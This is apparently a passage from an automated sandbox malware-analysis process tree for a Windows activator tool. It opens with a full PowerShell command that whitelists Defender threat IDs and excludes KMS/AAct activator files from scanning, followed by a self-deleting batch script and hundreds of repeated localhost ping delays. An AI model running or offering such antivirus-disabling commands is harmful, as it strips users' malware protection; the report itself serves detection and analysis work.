      powershell -noprofile -command Add-MpPreference -ThreatIDDefaultAction_Ids 2147685180 -ThreatIDDefaultAction_Actions Allow -Force; Add-MpPreference -ThreatIDDefaultAction_Ids 2147735507 -ThreatIDDefaultAction_Actions Allow -Force; Add-MpPreference -ThreatIDDefaultAction_Ids 2147736914 -ThreatIDDefaultAction_Actions Allow -Force; Add-MpPreference -ThreatIDDefaultAction_Ids 2147743522 -ThreatIDDefaultAction_Actions Allow -Force; Add-MpPreference -ThreatIDDefaultAction_Ids 2147734094 -ThreatIDDefaultAction_Actions Allow -Force; Add-MpPreference -ThreatIDDefaultAction_Ids 2147743421 -ThreatIDDefaultAction_Actions Allow -Force; Add-MpPreference -ThreatIDDefaultAction_Ids 2147765679 -ThreatIDDefaultAction_Actions Allow -Force; Add-MpPreference -ThreatIDDefaultAction_Ids 251873 -ThreatIDDefaultAction_Actions Allow -Force; Add-MpPreference -ThreatIDDefaultAction_Ids 213927 -ThreatIDDefaultAction_Actions Allow -Force; Add-MpPreference -ThreatIDDefaultAction_Ids 2147722906 -ThreatIDDefaultAction_Actions Allow -Force; Add-MpPreference -ExclusionPath C:\Windows\KMSAutoS -Force; Add-MpPreference -ExclusionPath C:\Windows\System32\SppExtComObjHook.dll -Force; Add-MpPreference -ExclusionPath C:\Windows\System32\SppExtComObjPatcher.exe -Force; Add-MpPreference -ExclusionPath C:\Windows\AAct_Tools -Force; Add-MpPreference -ExclusionPath C:\Windows\AAct_Tools\AAct_x64.exe -Force; Add-MpPreference -ExclusionPath C:\Windows\AAct_Tools\AAct_files\KMSSS.exe -Force; Add-MpPreference -ExclusionPath C:\Windows\AAct_Tools\AAct_files -Force; Add-MpPreference -ExclusionPath C:\Windows\KMS -Force;
      4⤵
      PID:1820
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\SelfDelete.bat
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3648
  - - C:\Windows\SysWOW64\chcp.com
      chcp 65001
      4⤵
      PID:1516
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1180
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:800
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1728
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3028
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:5068
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2864
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:5044
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1124
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:5056
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4832
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1028
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4324
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2348
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3044
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2896
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3620
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4964
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3856
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4596
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1664
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1496
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1128
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2336
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3576
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4456
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4976
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2788
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3088
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1144
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3924
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1640
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1184
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:5036
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:5072
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1532
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3372
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3744
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2948
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4792
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3544
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4796
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3224
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3544
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3028
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:5072
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:5036
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:5044
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2864
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:5068
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1532
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1904
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3372
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3744
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1728
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2948
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:800
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4792
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1320
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1180
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4392
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1808
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1132
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:264
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2580
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1772
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:5016
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:780
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3480
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3780
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1684
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3808
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2212
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1536
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1480
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      Runs ping.exe
      PID:4492
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3124
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4812
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3324
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2848
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:524
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:368
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1032
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:920
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1316
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4408
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:768
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:832
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3624
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4008
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2276
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4888
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2488
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:5020
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1096
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1928
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4940
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4876
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3572
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2544
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1160
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3044
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:452
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3488
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1528
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:5116
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4408
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4884
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1884
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3780
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3808
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1152
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3576
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1220
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3652
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1636
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3692
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4996
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3640
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2940
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1348
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3084
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1984
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3392
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3536
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1440
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1456
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:220
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1684
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1832
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3356
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4124
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:768
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3184
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2240
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:384
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3604
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1316
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:5064
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3432
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4968
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4144
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4960
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1128
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1272
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4208
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3424
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2848
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3324
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4812
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4944
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4456
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2348
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3332
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4416
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1372
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4440
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4392
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:5104
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4816
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4852
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2152
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4276
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:264
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3316
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3224
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3856
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3208
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4596
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1864
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4112
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:920
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3956
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1444
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3644
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4880
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3320
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2792
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:432
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4080
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4612
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1972
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:948
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3780
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1684
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4416
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1160
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2348
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3044
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4944
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2848
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3324
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4812
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4788
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1956
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4596
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1524
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3376
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4848
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1124
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3572
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3352
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2888
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4908
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2544
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:5036
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3908
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2192
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3840
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:5076
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1916
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3088
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:264
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2856
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4296
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2288
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:5008
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1996
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4532
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1404
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:5000
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4456
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3780
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1684
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2372
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4416
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1160
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2348
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4456
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1668
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:732
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:368
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:452
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1820
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1096
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4996
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1528
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4144
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3864
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1580
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:860
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4412
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4876
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1904
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3744
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2004
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3604
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3404
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4912
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2024
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:384
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1328
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:5092
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:5044
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4396
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:5040
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4124
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4936
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3680
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2892
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1168
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1696
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4312
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3700
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4968
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4408
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4384
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:948
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3780
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2252
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3476
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1972
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2212
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1792
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3040
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1172
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1408
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2808
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:936
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:64
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3320
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3772
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:628
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1632
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3704
